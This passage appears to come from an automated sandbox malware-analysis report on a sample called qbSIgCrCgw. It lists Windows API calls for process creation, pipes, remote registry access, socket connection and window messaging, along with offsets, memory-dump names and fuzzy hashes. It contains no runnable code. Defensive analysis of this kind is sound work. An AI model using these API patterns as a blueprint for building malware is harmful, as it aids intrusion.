                                                                                • Opcode Fuzzy Hash: 3826d04767ef519a8db451ea665d7800d046cf92f27161bde73bf96c469be43a
                                                                                • Instruction Fuzzy Hash: C6218E71600206BBFF104E64DC95EFB37A9EB99364F10462AFA1492290C735DCD2A769
                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 003F9588
                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003F95B9
                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 003F95CB
                                                                                • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 003F9605
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHandle$FilePipe
                                                                                • String ID: nul
                                                                                • API String ID: 4209266947-2873401336
                                                                                • Opcode ID: ca04ac937ec9961765d063a288b2f9a652512787b47144d9548f418dd7d9fd7b
                                                                                • Instruction ID: 5f61026122bf1554e805516db1f68f710e352c7f2d7e81a4b75e7dff3f6316e1
                                                                                • Opcode Fuzzy Hash: ca04ac937ec9961765d063a288b2f9a652512787b47144d9548f418dd7d9fd7b
                                                                                • Instruction Fuzzy Hash: D721627050020DABDB269F65DC05BAAB7F8AF56720F204A1AFEA5DB2D0D770D944CB10
                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 003F9653
                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003F9683
                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 003F9694
                                                                                • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 003F96CE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHandle$FilePipe
                                                                                • String ID: nul
                                                                                • API String ID: 4209266947-2873401336
                                                                                • Opcode ID: deebc19eb288dff9dc94605306edb0b5f1d9a2b6423ba5caa77d30dd477808ed
                                                                                • Instruction ID: 62670be5b4d760aaf80545ba561d79f27f4482aa78320070e1eb20b0f71353f9
                                                                                • Opcode Fuzzy Hash: deebc19eb288dff9dc94605306edb0b5f1d9a2b6423ba5caa77d30dd477808ed
                                                                                • Instruction Fuzzy Hash: E72186719002099BDB219F69DC44FAAB7ECAF55734F200A1AFEA1DB2D0D770D841CB54
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 003FDB0A
                                                                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 003FDB5E
                                                                                • __swprintf.LIBCMT ref: 003FDB77
                                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000,0044DC00), ref: 003FDBB5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                                                • String ID: %lu
                                                                                • API String ID: 3164766367-685833217
                                                                                • Opcode ID: d35116490795879ec7950a6f7d23485802df57d493c4d3d215612ae8fe020fdf
                                                                                • Instruction ID: 0b73c0ea84b4c76adb392e450423019a9d69b9ab8e52ee0a5167f87fccec1227
                                                                                • Opcode Fuzzy Hash: d35116490795879ec7950a6f7d23485802df57d493c4d3d215612ae8fe020fdf
                                                                                • Instruction Fuzzy Hash: D7219535A00108AFCB11EFA4DD85EEEBBB8EF48704B104069F609DB251DB70EE01DB61
                                                                                APIs
                                                                                  • Part of subcall function 003EC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 003EC84A
                                                                                  • Part of subcall function 003EC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 003EC85D
                                                                                  • Part of subcall function 003EC82D: GetCurrentThreadId.KERNEL32 ref: 003EC864
                                                                                  • Part of subcall function 003EC82D: AttachThreadInput.USER32(00000000), ref: 003EC86B
                                                                                • GetFocus.USER32 ref: 003ECA05
                                                                                  • Part of subcall function 003EC876: GetParent.USER32(?), ref: 003EC884
                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 003ECA4E
                                                                                • EnumChildWindows.USER32(?,003ECAC4), ref: 003ECA76
                                                                                • __swprintf.LIBCMT ref: 003ECA90
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                                • String ID: %s%d
                                                                                • API String ID: 3187004680-1110647743
                                                                                APIs
                                                                                • __lock.LIBCMT ref: 003D7AD8
                                                                                  • Part of subcall function 003D7CF4: __mtinitlocknum.LIBCMT ref: 003D7D06
                                                                                  • Part of subcall function 003D7CF4: EnterCriticalSection.KERNEL32(00000000,?,003D7ADD,0000000D), ref: 003D7D1F
                                                                                • InterlockedIncrement.KERNEL32(?), ref: 003D7AE5
                                                                                • __lock.LIBCMT ref: 003D7AF9
                                                                                • ___addlocaleref.LIBCMT ref: 003D7B17
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                • String ID: `C
                                                                                • API String ID: 1687444384-2712709324
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 0041E33D
                                                                                • _memset.LIBCMT ref: 0041E34C
                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00473D00,00473D44), ref: 0041E37B
                                                                                • CloseHandle.KERNEL32 ref: 0041E38D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: _memset$CloseCreateHandleProcess
                                                                                • String ID: D=G
                                                                                • API String ID: 3277943733-176316547
                                                                                APIs
                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 004119F3
                                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00411A26
                                                                                • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00411B49
                                                                                • CloseHandle.KERNEL32(?), ref: 00411BBF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                • String ID:
                                                                                • API String ID: 2364364464-0
                                                                                APIs
                                                                                • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0041E1D5
                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0041E20D
                                                                                • IsDlgButtonChecked.USER32(?,00000001), ref: 0041E248
                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0041E269
                                                                                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0041E281
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$ButtonCheckedLongWindow
                                                                                • String ID:
                                                                                • API String ID: 3188977179-0
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(?), ref: 003F1CB4
                                                                                • VariantClear.OLEAUT32(00000013), ref: 003F1D26
                                                                                • VariantClear.OLEAUT32(00000000), ref: 003F1D81
                                                                                • VariantClear.OLEAUT32(?), ref: 003F1DF8
                                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 003F1E26
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$Clear$ChangeInitType
                                                                                • String ID:
                                                                                • API String ID: 4136290138-0
                                                                                APIs
                                                                                  • Part of subcall function 003B936C: __swprintf.LIBCMT ref: 003B93AB
                                                                                  • Part of subcall function 003B936C: __itow.LIBCMT ref: 003B93DF
                                                                                • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 004106EE
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0041077D
                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0041079B
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 004107E1
                                                                                • FreeLibrary.KERNEL32(00000000,00000004), ref: 004107FB
                                                                                  • Part of subcall function 003CE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,003FA574,?,?,00000000,00000008), ref: 003CE675
                                                                                  • Part of subcall function 003CE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,003FA574,?,?,00000000,00000008), ref: 003CE699
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                • String ID:
                                                                                • API String ID: 327935632-0
                                                                                APIs
                                                                                  • Part of subcall function 00413C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00412BB5,?,?), ref: 00413C1D
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00412EEF
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00412F2E
                                                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00412F75
                                                                                • RegCloseKey.ADVAPI32(?,?), ref: 00412FA1
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00412FAE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                • String ID:
                                                                                • API String ID: 3740051246-0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                APIs
                                                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 004012B4
                                                                                • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 004012DD
                                                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0040131C
                                                                                  • Part of subcall function 003B936C: __swprintf.LIBCMT ref: 003B93AB
                                                                                  • Part of subcall function 003B936C: __itow.LIBCMT ref: 003B93DF
                                                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00401341
                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00401349
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                • String ID:
                                                                                • API String ID: 1389676194-0
                                                                                • Opcode ID: 27c8439a4808e414b7d5554ee784894fd1f0df3a574b2f5b158ac6af88b8a014
                                                                                • Instruction ID: 7259ba7d68133456471104d2b9eba196da58a2dd65ac26e16473736dc985e853
                                                                                • Opcode Fuzzy Hash: 27c8439a4808e414b7d5554ee784894fd1f0df3a574b2f5b158ac6af88b8a014
                                                                                • Instruction Fuzzy Hash: E8410035A00105DFDB01EF64C991AAEBBF5FF08314B1480A9E909AF761DB35ED01DB55
                                                                                APIs
                                                                                • GetWindowRect.USER32(?,?), ref: 003EB369
                                                                                • PostMessageW.USER32(?,00000201,00000001), ref: 003EB413
                                                                                • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 003EB41B
                                                                                • PostMessageW.USER32(?,00000202,00000000), ref: 003EB429
                                                                                • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 003EB431
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePostSleep$RectWindow
                                                                                • String ID:
                                                                                • API String ID: 3382505437-0
                                                                                • Opcode ID: fa16340512286866cd75d2e8e592314c9e0d9785d14b9829f3d4c9b2ad6d3c33
                                                                                • Instruction ID: e0c158dcae299763ccc59ada4d68f3a15af48a05c0441dd1ef8770ba6bc32060
                                                                                • Opcode Fuzzy Hash: fa16340512286866cd75d2e8e592314c9e0d9785d14b9829f3d4c9b2ad6d3c33
                                                                                • Instruction Fuzzy Hash: C331CE71900269EBDF06CF69D94EADFBBB5EB04315F114229F921AA1D1C3B0D914CB90
                                                                                APIs
                                                                                • IsWindowVisible.USER32(?), ref: 003EDBD7
                                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 003EDBF4
                                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 003EDC2C
                                                                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 003EDC52
                                                                                • _wcsstr.LIBCMT ref: 003EDC5C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                • String ID:
                                                                                • API String ID: 3902887630-0
                                                                                • Opcode ID: e392ce2a6c03fcd9a06032fdf74cc53080ad33d0dc5d214641e9bb7ad123378a
                                                                                • Instruction ID: adbfef44b5a4d436a57680817bd85a0fe19dac670987273394667b44d0eee442
                                                                                • Opcode Fuzzy Hash: e392ce2a6c03fcd9a06032fdf74cc53080ad33d0dc5d214641e9bb7ad123378a
                                                                                • Instruction Fuzzy Hash: 82213772204150BBEB165B3AAC49E7B7BACDF45750F20413AF809CA191EAA1DC01D360
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003EBC90
                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003EBCC2
                                                                                • __itow.LIBCMT ref: 003EBCDA
                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003EBD00
                                                                                • __itow.LIBCMT ref: 003EBD11
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$__itow
                                                                                • String ID:
                                                                                • API String ID: 3379773720-0
                                                                                • Opcode ID: 55db7af65037f12643a959b44eba283062c664396cc06acdacd95749043d7bb0
                                                                                • Instruction ID: 302d1bc806b537553e44caedf4b970b231b0733538aa6c3b7ecdb5630be1d9d6
                                                                                • Opcode Fuzzy Hash: 55db7af65037f12643a959b44eba283062c664396cc06acdacd95749043d7bb0
                                                                                • Instruction Fuzzy Hash: D921D431600628BBDB13AE669C86FDFBA6CAF4A310F101125FA05EF1C1DB648D0583A1
                                                                                APIs
                                                                                  • Part of subcall function 003B50E6: _wcsncpy.LIBCMT ref: 003B50FA
                                                                                • GetFileAttributesW.KERNEL32(?,?,?,?,003F60C3), ref: 003F6369
                                                                                • GetLastError.KERNEL32(?,?,?,003F60C3), ref: 003F6374
                                                                                • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,003F60C3), ref: 003F6388
                                                                                • _wcsrchr.LIBCMT ref: 003F63AA
                                                                                  • Part of subcall function 003F6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,003F60C3), ref: 003F63E0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                • String ID:
                                                                                • API String ID: 3633006590-0
                                                                                • Opcode ID: 36e9a5dcea3e7ddc91c0a471fa28a5efa5f4e924b2e953074da40be90bc8c458
                                                                                • Instruction ID: 2f672cd29ad9dbaacbf2c27fdbcf3bbdfa965c30565d58ec54f44114b02dfea9
                                                                                • Opcode Fuzzy Hash: 36e9a5dcea3e7ddc91c0a471fa28a5efa5f4e924b2e953074da40be90bc8c458
                                                                                • Instruction Fuzzy Hash: D821D53590421D9BDB17AB78AC43FFA33ACAF16360F10046BF245DB1E0EB60D9848A65
                                                                                APIs
                                                                                  • Part of subcall function 0040A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0040A84E
                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00408BD3
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00408BE2
                                                                                • connect.WSOCK32(00000000,?,00000010), ref: 00408BFE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastconnectinet_addrsocket
                                                                                • String ID:
                                                                                • API String ID: 3701255441-0
